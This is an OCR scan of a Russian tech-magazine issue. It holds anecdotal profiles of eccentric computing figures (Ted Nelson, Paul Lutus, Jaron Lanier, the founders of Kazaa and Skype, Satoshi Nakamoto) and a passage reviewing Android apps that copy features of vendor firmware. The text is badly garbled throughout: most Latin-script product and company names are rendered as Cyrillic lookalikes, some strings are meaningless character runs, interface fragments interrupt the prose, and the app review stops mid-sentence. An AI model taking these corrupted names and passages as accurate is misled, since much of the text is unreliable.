делает новую фирму, которую ждет та же судьба. Через не- 
сколько повторений настает пора отойти от дел, купить на за- 
работанные деньги особняк, стать венчурным инвестором, 
завести блог и заниматься наставлением следующего поко- 
ления стартап еров. 

Но этот сценарий справедлив, только когда речь идет о не- 
кой усредненной личности. А вот судьбы конкретных людей 
могут отходить от него — ив мелких деталях, и в крупных. Вме- 
сто венчурного фонда вполне может быть открыт ночной клуб, 
и это не выдуманный пример: клубом владеет один из созда- 
талей №ізсаре Джейми Завински. Эксцентричность богачей 
и творческих личностей широко известна, а когда в одном че- 
ловеке сходится и то и другое, ждать можно чего угодно. 

Безумные изобретатели были всегда: вспомнить хотя бы 
Николаса Теслу, страдавшего от невроза навязчивых состоя- 
ний. Он отказывался прикасаться к вещам, которые казались 
ему недостаточно чистыми, и обходил любое здание трижды, 
прежде чем зайти внутрь. Похожее расстройство преследо- 
вало и известного авиаконструктора Говарда Хьюза, но вме- 
сто круговых прогулок вокруг дома он любил раздеваться 
догола, запираться в комнате и в таком виде целыми днями 
сидеть перед телевизором. Это не помешало ему основать 
одну из крупнейших американских авиакомпаний, конструи- 
ровать новаторские самолеты и лично их испытывать. 

Подробнее о судьбе Хьюза можно узнать из фильма «Авиа- 
тор» с Леонардо Ди Каприо, а мы сосредоточимся на неодно- 
значных знаменитостях ранней компьютерной эпохи и наше- 
го времени. Некоторые примеры известны всем и то и дело 
мелькают в новостях. Тот же Ричард Столлман нередко вы- 
ступает предметом подтрунивания из-за того, что живет 
по придуманным самостоятельно строгим правилам, напо- 
минающим по вычурности законы иудейской религии, но со- 
вершенно не стесняется странных выходок вроде прилюдного 
поедания мозолей с ноги. 

Или взять Джона Макафи, который недавно был в бегах 
в Южной Америке в обществе журнального репортера и двух 
стриптизерш — полиция разыскивала Макафи по обвинени- 
ям в незаконном хранении наркотических веществ и оружия, 
а также в убийстве. А чего стоит добродушный толстяк Ким 
Шульц-Дотком — владелец огромного поместья в Новой Зе- 
ландии, любитель шумных вечеринок и фотосессий в компа- 
нии топ-моделей! 

И если детище Кима Доткома — это всего лишь обвешан- 
ное рекламой файлохранилище МедаирІоасІ, облюбованное 
пиратами и за это закрытое, то Макафи все же основал одну 
из главных антивирусных компаний, а Столлман придумал 
свободную лицензию, без которой возможность многих со- 
временных достижений могла оказаться под вопросом. 

Наверное, именно о таких людях говорилось в леген- 
дарном рекламном ролике Арріе, который славит безумцев 
и гениев, видящих мир в ином свете, чем все остальные, 
и не робеющих менять его. «Можно считать их злодеями или 
героями, но что точно не выйдет — это игнорировать их». 




Андрей Письменный 
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Общеизвестно, чтоѴѴобб ѴѴібеѴѴеЬ разработал Тим Бернерс-Ли 
в начале девяностых годов. Источниками его вдохновения были 
язык разметки ЗѲМ1_ и созданная в Арріе система быстрой раз- 
работки приложений НурегСагсІ, где имелась возможность свя- 
зывать карточки при помощи ссылок. Но мало кто знает, что по- 
нятие гипертекста и само слово «гипертекст» было изобретено 
до ѴММ/, до НурегСагсІ и даже до появления компьютерных се- 
тей. 

Первым идеологом гипертекста был Тед Нельсон, а изобре- 
тение датируется 1960 годом. Нельсону тогда было 23, он учил- 
ся на философском факультете Гарварда и имел доступ к уни- 
верситетскому компьютеру. На нем -то он и начал создавать 
необычный текстовый редактор, где документы имели связи 
друг с другом. Впрочем, мыслил Нельсон глобальнее: он был 
в буквальном смысле слова одержим грандиозной идеей — 
придумать способ сохранить все знания мира в таком виде, 
чтобы ничего лишний раз не повторялось. 

Понять, почему Нельсона так привлекала эта мысль, не- 
сложно, если знать о том, что он всю жизнь мучился от сильно 
выраженного синдрома дефицита внимания, а принимаемые 
им медикаменты давали другие неприятные эффекты. 

У Нельсона всегда было множество идей, но все, что при- 
думывал, он мог моментально забыть, на что-то отвлекшись. 
Известно, что Нельсон всегда имел при себе кучу блокнотов 
и ручек, а также как минимум один диктофон и иногда видеока- 
меру. Все это он непрерывно использовал для борьбы с забыв- 
чивостью и в какой-то момент даже арендовал складское поме- 
щение для хранения своих бесчисленных записей. Но что толку, 
если найти в них что-то было малореально? Придуманная им 
гипертекстовая система должна была стать универсальным 
решением его проблемы — чудотворным протезом для памяти 
и заодно ответом на многие нужды человечества. 

Проект был назван Хапаби, и Нельсон взялся бы за его ре- 
ализацию сам, да не мог: во-первых, не был настоящим про- 



граммистом, во-вторых, не был в состоянии довести до конца 
даже небольшое дело, что уж говорить о столь грандиозном. 
Вместо этого он писал книги (очень странные — состоящие 
из обрывков текста на разные темы), выступал на лекциях 
и на протяжении многих лет пытался собрать команду, которая 
бы воплотила Хапаби в жизнь. 

Замысел Нельсона состоял в том, чтобы сделать систему, 
где документы (в перспективе — не только текстовые, но также 
аудио и видео) имели бы двусторонние связи друг с другом, 
версии, подобные тем, что сейчас можно найти в Википедии, и, 
самое главное, сложную схему цитирования. 

В Хапаби должна была отсутствовать возможность скопиро- 
вать текст в другой документ, не указав ссылку на источник. Это 
позволяло избежать дублирования информации и в перспек- 
тиве давало возможность ввести финансовую модель, при ко- 
торой автор цитируемого документа получал бы отчисления 
от просмотров цитаты. 

Надежда на финальный результат маячила на горизонте 
дважды: первый раз — когда в семидесятых годах Хапаби под 
влиянием Нельсона создавали вчерашние школьники (се- 
рьезные разработчики с ним тогда связываться не хотели), 
второй раз — в начале девяностых, на деньги фирмы Аиіобезк 
и при участии выходцев из легендарной лаборатории Хегох 
РАНО. Увы, финансирования ученым хватило только на то, чтобы 
разработать прекрасные математические модели и прототипы 
на ЗтаІПаІк, но не готовый продукт. Вскоре Хапаби позабыли — 
появившийся в те годы веб хоть и уступал в возможностях, зато 
работал . 

Отчасти Хапаби страдал от технических ограничений. По- 
явившись до сетей, он не имел распределенной структуры, 
и разработчики пытались хранить и обрабатывать всю инфор- 
мацию на одном компьютере — его ресурсов вечно не хватало. 
А еще преградой стала сама личность Нельсона, который ско- 
рее мог собрать вокруг себя секту, чем успешную софтверную 
компанию. 

Кстати, несмотря на преклонный возраст (76 лет) Нельсон 
и сейчас продолжает читать лекции и искать программистов, 
готовых разобраться с наследием Хапаби. Правда, для этого 
пришлось уехать в Японию — по его словам, там слушают на- 
много охотнее. 




Хапаби Зрасе — почти 
что современная ин- 
карнация Хапаби 
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СОЗДАТЕЛЬ ПЕРВОГО ПОПУЛЯРНОГО ТЕКСТОВОГО 
ПРОЦЕССОРАДЛЯ ПК: 




Бросить университет, заняться самообразованием, придумать 
систему электроснабжения для космического шаттла и пойти 
в ІЧА5А — чем не план? Пола Лутуса совершенно не смутила его 
нереалистичность, и не зря: изобретение сработало лучше, чем 
диплом инженера, и Лутус был немедленно принят на работу. 
А к 35 годам он решил, что заработал достаточно денег, чтобы 
уйти на досрочную пенсию. Правда, без излишеств: на нако- 
пления была куплена хижина где-то в лесах Орегона, и Лутус 
успешно стал отшельником. 

Так бы и продолжалось, не попади ему в руки журнал со ста- 
тьей про новенький по тем временам персональный компью- 
тер — Арріе II. Лутус не стал медлить и потратил на его при- 





Та самая 
хижина 



обретение две трети остававшихся денег, а в хижину провел 
электричество. Решив, что хорошо бы обзавестись программой 
для написания текстов, Пол Лутус создал свой текстовый про- 
цессор — времени на это у него было предостаточно. 

Нужно понимать, что Арріе ѴѴгіЩг, как и другие текстовые 
процессоры того поколения, отличался от привычного нам 
Могсі’а, Оформление документа проводилось не визуаль- 
но, а с помощью специальных тегов, чем-то напоминающих 
язык ДоИ (на нем до сих пор размечают тап-статьи в ІІІЧІХ- 
системах). Все буквы отображались как заглавные, а те буквы, 
которые действительно были заглавными, отображались дру- 
гим цветом. Чтобы посмотреть на результат своей работы, его 
нужно было распечатать — только тогда редактор обрабатывал 
все теги и оформлял документ так, как было задумано. 

История умалчивает о том, как вести о программе добра- 
лись из хижины до Арріе, но уже скоро права на распростране- 
ние редактора перешли к калифорнийской компании, название 
сменили на Арріе ѴѴгіІег, а автор обогатился. 

Хижину Лутус не бросил, а в штаб-квартиру Арріе доби- 
рался так: садился на велосипед, ехал в аэропорт, заталкивал 
велосипед в один из двух своих самолетов, летел в Калифор- 
нию и, приземлившись, как ни в чем не бывало заканчивал путь 
до штаб-квартиры на том же велосипеде. Управление само- 
летом стало не единственным новым развлечением Лутуса: 
еще он купил яхту и научился с ней обращаться. Велосипед, 
как всегда, брал с собой — вдруг захочется причалить к бере- 
гам Австралии и прокатиться? 

Впоследствии Лутус написал книжку о том, как обошел под 
парусом всю землю, а однажды даже столкнулся с пиратами 
и отогнал их, угрожая дробовиком. В остальное время Лутус 
продолжал программировать, правда, распространял новые 
творения бесплатно. Еще в качестве благотворительности 
он выстроил клинику планирования семьи в близлежащем го- 
родке, за что подвергся большой критике со стороны религи- 
озного населения. 

Сейчас Полу Лутусу 66 лет, он уже не водит самолет, но по- 
прежнему живет в лесу, программирует {последнее увлече- 
ние — приложения для АпсІгоісІ, довольно специфичные: о оо.д і/ 
Ь_К_Ну V К ) и каждый год ездит на Аляску фотографировать белых 
медведей. 
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СОЗДАТЕЛЬ ПЕРВЫХ ОЧКОВ ВИРТУАЛЬНОЙ РЕАЛ Ь 
НОСТИ: 
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Не исключено, что скоро слова «виртуальная реальность» сно- 
ва войдут в повседневный обиход благодаря шлему Оси I из РШ, 
но пока что они ассоциируются в основном с кадрами из ста- 
рых фантастических фильмов. Их герои, надевая на голову 
громоздкие приспособления, погружались в темный мир с раз- 
бросанными тут и там разноцветными сетчатыми объектами; 
именно так в восьмидесятые годы выглядел передний край 
компьютерной графики. 

Джейрон Ланье — автор термина «виртуальная реальность», 
а заодно основатель компании ѴРІ_, разработавшей по заказу 
ИА5А первые прототипы шлемов и перчаток. Вот картина, ко- 
торую застал редактор журнала ѴѴйоІе ЕаПИ Веѵіеѵѵ, пришедший 
брать интервью у Ланье в 1989 году. Посередине комнаты стоят 
два здоровенных компьютера ЗІІісоп Сгарбісз, мощности каж- 
дого как раз достаточно, чтобы выводить картинку для одного 
глаза. На экранах можно видеть компьютерный мир — по тем 
временам очень продвинутый: сделанный не из сеточек, а из за- 
тененных разноцветных поверхностей. Человек в шлеме (Ланье) 
делает загадочные пассы рукой, заключенной в обмотанную 
проводами перчатку. Рядом девушка (подруга Ланье) готовит 
к демонстрации незаконченный прототип целого костюма, 
предназначенного для полного погружения в виртуальный мир. 

Сейчас это описание больше напоминает о наивном про- 
шлом, но в те времена выглядело скорее кусочком удивитель- 
ного будущего, которое сбывается буквально на глазах. Ланье 
нисколько не сомневался в том, что технологии, связанные 
с виртуальной реальностью, ждет скорый успех. Он даже вы- 
ражал опасение, что они могут оказаться крайне аддиктивными 
и попадут под запрет — как уже попали другие популярные сре- 



ди его друзей развлечения (такие как І_5й и галлюциногенные 
грибы). 

Мечты о виртуальной реальности тогда не сбылись, и фир- 
ма ѴРІ_ обанкротилась в 1990 году, а Ланье в течение последу- 
ющих десяти лет участвовал в проекте высокоскоростной сети 
Іп1:егпеі2, не забывая уделять время другому своему увлече- 
нию — классической музыке и коллекционированию музы- 
кальных инструментов. Однако безобразия, которые начались 
в нулевых годах, заставили Ланье снова выступать на конфе- 
ренциях, давать интервью и даже написать две очень неодно- 
значные книги. 

Что за безобразия? Ну как же — Ыпих, ѴѴікіресІіа, РасеЬоок, да 
даже Ооодіе, — все это, по мнению Ланье, вещи неправильные 
и опасные, и человечество должно отказаться от них как можно 
скорее. А если не выйдет — отключить интернет и начать все 
заново, на этот раз по-нормальному. Нормальный же способ 
такой: ни в коем случае не делать обезличенных мегапроектов, 
подавляющих отдельные людские голоса, а корпорации заста- 
вить делиться с народом прибылями, полученными с каждого 
бита личной информации. Домашние странички, по мнению 
Ланье, прекрасны, потому что индивидуальны, а \А/еЬ 2.0 — это 
мода на бесчеловечный суррогат, «онлайновый коллективизм» 
и «цифровой маоизм». 

Подробности взглядов Ланье можно найти в статье «Полови- 
на манифеста» (Опе-НаКоІ 1 а Мапі^езіо) и книгах «Ты — не гаджет» 
(Уои Аге N 01 а Оасіде!) и «Кто владеет будущим?» (ѴѴйо Оѵѵпз ійе 
РЩиге?). Последняя посвящена не столько опасностям коллек- 
тивизма, сколько нападкам на фирмы, которые бесплатно полу- 
чают от людей персональные данные и используют их в своих 
целях. Решение Ланье заключается в том, чтобы ввести систе- 
му, которая отслеживала бы перемещение личной информации 
и давала бы возможность делиться отчислениями с пользовате- 
лями. Как ни парадоксально, повсеместные слежка и учет, необ- 
ходимые для введения таких мер, нисколько не беспокоят Ланье. 








* 



На фото в очках и пер- 
чатке ѴРЬ позирует 
не девушка Ланье, 
а художник Николь 
Стэнджер, известная 
своими трехмерными 
картинами 
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Двое шведов Николас Зеннстрём и Янус Фриис познакоми- 
лись, работая в фирме ТеІе2, да так хорошо сошлись, что вместе 
перебрались и на следующую работу, а потом решили сделать 
собственный проект. Их первым продуктом стала известная 
пиринговая сесть Кагаа. Основатели утверждают, что их на- 
стоящей целью было открыть честный сервис, — люди бы им 
пользовались, чтобы передавать друг другу какие-нибудь (ле- 
гальные!) данные. Но обмен музыкой и фильмами в двухтысяч- 
ном году был горячей темой — тогда суд как раз рассматривал 
дело Ыарзіег, и разработка распределенной файлообменной 
сети вряд ли была совпадением. 

Главное отличие Ка^аа в том, что у нее не было единого 
сервера, а значит, полиции нечего будет изымать, а звукозапи- 
сывающим компаниям некого преследовать со своими юриди- 
ческими нападками. Впрочем, второе утверждение оказалось 
спорным. Есть ведь основатели, которых можно привлечь к от- 
ветственности и попытаться заставить демонтировать сеть. По- 
этому Зеннстрёму и Фриису приходилось скрывать адрес сво- 
его офиса, часто перемещаться с места на место, а с нанятой 
в Эстонии группой программистов встречаться в модном клубе, 
а не в переговорной комнате. 

Однажды парочка рисковых предпринимателей была бук- 
вально на волосок от серьезных неприятностей. Ассоциация 
звукозаписывающих компаний позвала их для переговоров 
в Лос-Анджелес — якобы с тем, чтобы обсудить возможность 
легализации Кагаа. Мало того что ни к какой договоренности 
прийти не удалось, так дело еще в какой-то момент серьез- 
но запахло керосином: Зеннстрёму и Фриису угрожал арест, 
но они успели вовремя покинуть Соединенные Штаты. 

В другой раз беда угрожала лично Зеннстрёму — он мирно 
шел под руку с женой к своей лондонской квартире, как вдруг 
откуда ни возьмись появился адвокат на мотоцикле, который 
попытался всучить ему повестку. Семейной паре еле удалось 
спастись бегством. 

Когда стало понятно, что денег Кагаа не принесет, а про- 
блем с законом не оберешься, Зеннстрём и Фриис решили дис- 
танцироваться от своего начинания и зарегистрировали фирму 
Эоііісі на Британских Виргинских островах (это в традиционном 
пиратском месте — Карибском море). На нее записали все свя- 
занное с технологиями, а Кагаа передали своим партнерам — 
владельцам фирмы Збагтап МеДл/огкз с пропиской в островной 
республике Вануату (это у берегов Австралии). 

Следующее начинание Зеннстрёма и Фрииса тоже строи- 
лось на распределенных технологиях, но было сугубо легаль- 
ным. Его название нам хорошо известно — это Зкуре. Первая 
публичная версия была выпущена в 2003 году, и уже через пару 
лет количество пользователей исчислялось десятками милли- 
онов. Успех не мог не привлечь внимание больших компаний, 
и в 2005 году Зкуре был куплен владельцами аукциона еВау 
за 2,6 миллиарда долларов. 
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Об этом персонаже известно лишь два факта: он разработал 
Віісоіп и его зовут Сатоси Накомото. Многие верят в то, что соз- 
данная им элегантная технология анонимных электронных пла- 
тежей изменит мир. А вот о личности самого Накомото ходят 
самые разнообразные догадки. Каково его настоящее имя? 
Действительно ли он японец? Нарочно ли он попеременно ис- 
пользует британскую и американскую грамматику? Не скры- 
вается ли за псевдонимом Накомото кто-нибудь известный? 
И наконец — один ли это человек или целый коллектив? Ответы 
рано или поздно будут получены, и тогда эту историю можно 
будет ставить в один ряд с самыми удивительными рассказами 
об изобретателях. Пока же придется подождать. ЗС 
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Все бы хорошо, но через какое-то время обнаружилось, 
что патенты на технологии Зкуре принадлежат боНісІ и их переда- 
ча в сделку не входила. А еще чуть позже выяснилось, что Зкуре 
не приносит предполагавшейся прибыли, и еВау поспешил вы- 
делить его в самостоятельную компанию. Зеннстрём, не теряя 
времени даром, собрал группу предпринимателей, скупившую 
акции обратно, и вошел в совет директоров Зкуре. Его фирма 
вернулась к нему как неразменный рубль — с той разницей, 
что номинал несравнимо больше. 

Что произошло дальше, мы отлично знаем: Зкуре снова уда- 
лось продать — на этот раз МісгозоЙ, и за неплохую цену в 8,5 
миллиарда долларов. Надо думать, что Стив Балмер не повто- 
рил ошибки своих предшественников из еВау и особо позабо- 
тился о том, чтобы его компании достались заветные патенты 
боНісІ. А вот вопрос о том, какой фокус в следующий раз про- 
вернет Зеннстрём, пока остается открытым. 
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Как получить лучшие 
функции фирменных 
прошивок от 5 атзипд, 

Моіогоіа и ЬС 

в стоковом Андроиде 

Прошивки смартфонов многих про- 
изводителей — это зачастую не- 
что гораздо большее, чем просто 
АпсІгоісІ. Тот же Оаіаху 54 просто-таки 
нафарширован различными функ- 
циями. С другой стороны, часто 
дополнительная функциональность 
оказывается настолько удачной, что 
возникает желание немедленно обра- 
титься в Соодіе с просьбой включить 
ее в ванильный АпсІгоісІ. К счастью, 
даже если Соодіе не ответит, всегда 
найдется приложение, повторяющее 
нужную функцию достаточно точно. 

ПРЕДИСЛОВИЕ 

Поводом к написанию этой статьи стал анонс смартфона Моіо X 
всем нам известной Моторолы. Одна из его функций, а именно 
Асііѵе Оізріау, которая выводила уведомления прямо на экран 
во время их появления или когда берешь смартфон в руку, на- 
столько меня заворожила, что я взялся за поиски альтернатив- 
ной реализации чего-то похожего для стокового АпсІгоісІ. Сразу 
ничего, конечно, найти не удалось, но со временем в Соодіе 
РІау появилось несколько реализаций идеи, одна из которых 
оказалась очень даже неплохой; я приобрел платную версию 
и до сих пор с удовольствием использую приложение. 

Позже появилось желание изучить мир прошивок других 
смартфонов и узнать, можно ли получить их функциональ- 
ность в голом АпсІгоісІ. Результаты этих изысканий предлага- 
ются твоему вниманию. 

АСТІѴЕ ОІЗРІАУ 

Начнем с того самого активного дисплея. Если ты пропустил 
анонс или обзор Моіо X, то Асііѵе Оізріау — это фоновый сервис, 
который при появлении нового уведомления {пришло письмо, 
сообщение, 5М5) включает экран и выводит на него информа- 
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цию о пропущенных событиях в лаконичном виде. 
Через некоторое время экран гаснет, но, когда 
берешь смартфон в руки, вновь загорается, так 
что нажимать кнопку включения вообще не нуж- 
но. Более того, если уведомление придет, когда 
телефон находится в кармане, дисплей загорится 
только после того, как ты достанешь его. 

Это действительно очень удобный способ 
просмотра пришедших сообщений и уведом- 
лений, который к тому же спасет смартфон 
от преждевременной смерти кнопки включения. 
Приложений, активирующих данную функцию 
в стоковом Апсігоісі, пока только два, это Асііѵе 
ІЧоІіІу и ОупатісМоІіІісаІіопз. Причем, как оказа- 
лось, первое всего лишь пародия на Асііѵе Эізріау, 
которая умеет включать экран во время возник- 
новения событий, но не включает его при взятии 
смартфона в руки или при извлечении из карма- 
на. Поэтому фактически реальная замена только 
одна. 

Нужная функциональность есть только в плат- 
ной версии ОупатісМоІіІісаІіопз, но она стоит 
всего один доллар, поэтому смело покупаем, 
устанавливаем и запускаем, после чего ви- 
дим экран настроек. Включаем опцию ЕпаЫе 
ОупатісМоІіІісаІіопз, ниже включаем опцию 
Аиіо-ѵѵаке, которая как раз отвечает за умный 
показ уведомлений, а также по желанию опцию 
МідНІ-тосІе, которая отключает активный ди- 
сплей на ночь {да, время можно настроить). Если 
речь идет об аппарате на АпбгоісІ 4.3, после за- 
пуска приложение также попросит предоставить 
ему доступ к уведомлениям и само перенапра- 
вит в нужный раздел настроек. Благодаря этой 
функции ОупатісМоІіІісаІіопз сможет показывать 
не только сам факт возникновения уведомления, 
но и подробности о нем. 

Далее смартфон можно спокойно использо- 
вать в повседневной жизни. Когда придет уведом- 
ление, экран загорится и позволит получить до- 
ступ к подробностям события и разблокировать 
устройство. Внутренние алгоритмы приложения 
достаточно хороши для того, чтобы, например, 
при извлечении из кармана экран всегда заго- 
рался, как положено. Если же смартфон лежит 
на столе, то доступ к уведомлениям можно по- 
лучить, просто проведя ладонью поверх датчика 



приближения (чуть выше экрана). Если смартфон 
перевернуть, отключится активный дисплей. 

Теперь о том, сколько батареи жрет софти- 
на и как быть с не-АМОІ_ЕЭ дисплеями. Простой 
ответ на первый вопрос: 2-4%. Сложный: в отли- 
чие от Моіо X, в котором под активный дисплей 
отведено работающее на пониженных частотах 
ядро процессора, ОупатісМоІіІісаІіопз включа- 
ется только тогда, когда есть сами уведомления, 
и только в это время он тратит батарею на сле- 
жение за датчиками приближения и положения, 
в остальное время процесс спит. Если вклю- 
чить в настройках приложения использование 
ОупатісМоІіІісаІіопз в качестве экрана блокиров- 
ки, он будет бодрствовать всегда и съест пример- 
но 20%. Нужно это тебе или нет, решай сам. 

Что касается АМОІ-ЕО, то историю с ним при- 
думали те, кто не знал, как на самом деле работа- 
ет активный дисплей в Моіо X, и думал, что экран 
там горит вообще всегда. В данном случае тип 
дисплея не имеет практически никакого значе- 
ния, и в Моіо X с таким же успехом могли бы по- 
ставить матрицу ІР5+. 

АІН8ѴѴІРЕН 

Я уже упоминал, как можно включать экран, прове- 
дя ладонью над датчиком приближения. По сути, 
это баг {который фича) ОупатісМоІіІісаІіопз, по- 
явившийся в результате работы алгоритма, отве- 
чающего за включение экрана после извлечения 
из кармана. Однако если в данном приложении 
бесконтактные жесты всего лишь побочный эф- 
фект, то в некоторых прошивках и приложениях 
это полноценная функция, которой хвастается 
производитель. 

Например, в прошивках от компании Затзипд 
бесконтактные жесты занимают далеко не по- 
следнее место среди других популярных функций. 
Здесь с их помощью можно включать и выключать 



смартфон, перелистывать страницы в браузере, 
переключать треки и принимать звонки. И смарт- 
фон даже умеет различать, какой именно сторо- 
ной руки пользователь провел над датчиком: ла- 
донью или ребром. 

Большая часть этой функциональности — это 
обычный для Затзипд рекламный ход, почти 
не имеющий практического применения {очень 
сложно представить человека, которому будет 
удобнее перелистывать страницы, махая рукой, 
чем проматывать пальцем), однако, как показал 
пример с ОупатісМоІіІісаІіопз, даже такая спор- 
ная идея, как бесконтактные жесты, может найти 
достойное применение. 

В Ооодіе РІау на тему бесконтактных жестов 
есть полностью бесплатное приложение под на- 
званием Аіг Зѵѵірег. Среди его возможностей: 

* автоматическое включение экрана при полу- 
чении ЗМЗ и открытие сообщения жестом; 

• включение и выключение экрана жестом; 

• включение беззвучного режима с помощью 
удержания руки над датчиком приближения; 

* включение/выключение ѴѴі-Рі и Віиеіооіб же- 
стом. 

Не знаю, будет ли вся эта функциональ- 
ность удобна тебе, тут надо пробовать самому. 
Для себя я нашел только одну полезную функ- 
цию: включение экрана жестом. В конце концов, 
ОупатісМоІіІісаІіопз срабатывает только тогда, 
когда есть уведомления, а это приложение рабо- 
тает всегда. Оказалось, однако, что функция куда 
менее удобна, чем кажется. Для разблокировки 
устройства приходится проводить рукой не один, 
а целых три раза, что сделать правильно удается 
далеко не всегда. К тому же от случайного сраба- 
тывания трехразовый взмах также не защищает; 
телефон может разблокироваться, если, напри- 
мер, держа его в руке, пройти рядом с забором. 
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В общем и целом, Аіг Зѵѵірег — интересное 
приложение, но его полезность невысока, как, 
впрочем, и полезность аналогичной функцио- 
нальности в фирменных прошивках. 
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8МДВТ8ТАѴ 

Еще одна разрекламированная функция проши- 
вок от Затзипд — это функция Згпагі Зіау, кото- 
рая появилась в Оаіаху 53 и была предназначена 
для поддержания экрана включенным до тех пор, 
пока пользователь от него не отворачивался. 
В основе механизма лежал достаточно простой 
алгоритм, который периодически делал снимок 
фронтальной камерой и анализировал, открыты 
ли глаза пользователя. Да — тайм-аут отключения 
продлевается, нет — отключаем экран, 

Функция действительно хорошо работала 
и имела успех у пользователей, поэтому в Оаіаху 
34 Затзипд расширила ее и, по своей традиции, 
довела идею до абсурда. В частности, появилась 
функция включения паузы в видеоплеере при от- 
ведении взгляда от экрана {специально для про- 
смотра порно, видимо), прокрутка страницы, 
когда взгляд достигает конца экрана в браузере 
(игра: успей прочитать последнюю строку) и от- 
ключение автоматического поворота экрана 
при наклоне устройства вместе с головой {мы же 
так любим читать, лежа на боку!). 

Но как бы ни были абсурдны идеи, заложен- 
ные в 54, оригинальный Зтагі Зіау действитель- 
но хорош. И неудивительно, что в Соодіе РІау 
появилось множество подражателей. Зпгіагі Зіау 
Ех — один из них. Это небольшое приложение, ко- 
торое делает ровно то, что оригинальная функция 
из третьего Оаіаху, то есть просто не дает экрану 
погаснуть. 

Все, что нужно сделать, чтобы получить эту 
функцию на своем смартфоне, — просто уста- 
новить и запустить приложение, включить его 
с помощью переключателя в верхней части экра- 
на и выбрать опцию Зіагі: аі Ьооі. После этого 
в строке состояния появится значок приложения, 
который будет менять цвет в зависимости от си- 
туации: синий — экран не будет отключаться, се- 
рый — экран будет отключен через минуту, жел- 
тый — идет сканирование. 

Приложение просыпается каждые несколько 
секунд (половина от системного тайм-аута блоки- 
ровки) и делает снимок. Если результат анализа 
снимка будет положительным {глаза открыты), 
тайм-аут выключения экрана будет продлен, от- 
рицательный — приложение заснет еще на не- 
сколько секунд и после второй неудачной по- 
пытки сканирования отключит экран. Количество 
попыток можно выбрать самостоятельно, от 1 
до 5, но дефолтовое значение 2 здесь полностью 
оправданно. Даже в вечернее время Зтагі Зіау Ех 
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всегда правильно определяет состояние глаз, по- 
этому обычно достаточно только одной попытки. 

Как вердикт: определенно тизі: баѵе, точная 
работа и минимальная, почти незаметная, нагруз- 
ка на батарею. Минус один: часто дает сбои ночью. 

ОІЛСКЗЕТТШС8 

Очередная знаменитая функция прошивок 
от Затзипд — это панель быстрых настроек, не- 
большая плашка с кнопками включения/выклю- 
чения ѴѴі-Рі, звука, ОРЗ и прочего, которая на- 
ходится в верхней части «шторки». Изначально 
идея, конечно, была придумана и реализована 
не Затзипд, а разработчиками СуаподепМосІ, 
а после этого растащена всеми кому не лень (на- 
пример, АОКр РагапоісІАпсІгоісІ, МІЕІІ). В самом 
СуаподепМосІ она доступна начиная с древнего 
ст7, но если ты предпочитаешь использовать 
голый АпбгоісІ или фирменную прошивку произво- 
дителя устройства, то получить нужную функцио- 
нальность можно, установив Зейіпдз Ехіепбеб. 




ШРО 

В СуаподепМосІ 
отключение 
звука по времени 
можно настроить 
в меню «Звук — ► 
Тихие часы». 



Зупсіпд... 



■ Зіор Зупсіпд 

ЕтаіІ Зупс Еіпк... 
Сору Зупс Ііпк 
Зе* Зупс РаззѵѵогсІ... 




Приложение ЗупсЗрасе ЗГіагесІ ѴѴНііеЬоагс! 




ѴоиТиЬе с плавающим окном 



По сути, все, что делает это приложение, — 
это создает в шторке те самые кнопки. Но есть 
и множество гибких настроек, с помощью которых 
можно определить количество и набор отобра- 
жаемых кнопок, добавить вторую строку кнопок, 
а также определить их внешний вид и цвет. По- 
следние две настройки, однако, доступны только 
в платной версии приложения, но ее цена всего 
один доллар. Также платная версия включает 
в себя дополнительные кнопки и возможность за- 
пуска других приложений. 

Каких-либо проблем, связанных с работой 
кнопок и их поведением, свойственных другим 
подобным приложениям, в ЗеНіпдз Ехіепбесі нет. 
Строка кнопок всегда отображается в верхней 
части панели, не съезжает вниз и не исчезает 
при очистке шторки. Кнопки срабатывают сразу 
после нажатия и не приводят к открытию каких- 
либо окон. Все работает ровно так, как и должно, 
но за это приходится платить тем, что приложение 
доступно только для АпбгоісІ 4.0 и выше (именно 
в четвертой версии появились все необходимые 
функции, позволяющие реализовать интерактив- 
ные уведомления). 

В общем и целом — просто отличная альтер- 
нативная реализация оригинальной функцио- 
нальности. 

МНОГООКОННЫЙ РЕЖИМ 

В прошивках І_Ѳ и Затзипд есть две разные в ре- 
ализации, но одинаковые по назначению функции 
ИЗ ОЗіібе и Затзипд Рор-Эр РІау. Это не что иное, 
как набор приложений (браузер, видеоплеер, 
калькулятор и так далее), которые умеют рабо- 
тать в обособленном плавающем окне, так же 
как в ѴѴіпскжз например. Не совсем понятно, 
чем, кроме рекламы, руководствовались обе 
компании, включая такие функции в прошивки 
для смартфонов, но в планшете нечто подобное 
может быть очень и очень удобным. 
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ЕпаЫе РІір45іІепсе 
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Мосіе 
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Сиггепі зепзіііѵііу: ІМогтаІ 
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Аиіо ѴіЬгаІе с предложением выбрать место и радиус Аиіо ѴІЬгаІе и тихие часы 

срабатывания 



РІір45іІепсе 



В Ооодіѳ Ріау подобных приложений доволь- 
но много. Причем, как оказалось, функциональ- 
ность, позволяющая реализовать такой режим, 
есть в АРІ АпсІгоісІ, так что они не требуют ни прав 
гооТ ни каких-либо хаков вроде ХрозесІ. Из наи- 
более примечательных можно назвать заметки 
Ноайпд Зііскіез, веб-браузер ОѵегЗкгееп, видео- 
плеер Зйск II!, ютуб-плеер с длинным названием 
РІоайпд УоиТиЬе Рорир Ѵісіео, клавиатуру А.Цуре 
кеуЬоагсІ іаЫеІ, а также Тіпу Аррз — комплект 
из пяти приложений, в который входят: 

• заметки с возможностью вставки, копирова- 
ния и сохранения; 

• простой диктофон; 

• холст для рисования с возможностью сохра- 
нения и отмены; 

• простой музыкальный проигрыватель; 

• калькулятор с поддержкой сложных математи- 
ческих операций. 

Уверен, что большинство из этих приложений 
не приживутся на твоем устройстве, а останутся 
разве что видеоплеер и клавиатура. У клавиа- 
туры, кстати, есть три режима работы: обычная, 
плавающая и плавающая с разделением клавиш 
для правой и левой рук. В последнем режиме 
она будет состоять из двух разных блоков кла- 
виш, расположенных в разных сторонах экрана, 
что существенно упрощает ввод текста, а к тому 
же не отнимает место у запущенного в данный 
момент приложения. 

Что касается самой идеи, то, на мой взгляд, 
она во многом бесполезна. Экраны гаджетов 
не настолько велики, чтобы многооконность была 
оправданной. 

І.С VII ТАІ.К 

В прошивке смартфонов серии Оріітиз Ѵи II есть 
поддержка интересной технологии под названи- 
ем І_(3 Ѵи Таік. Это такой местный Раіпі, позволяю- 



щий во время звонка рисовать и делать заметки, 
которые сразу увидит собеседник. Очень даже 
полезная в некоторых ситуациях функциональ- 
ность: можно быстро набросать схему или обсу- 
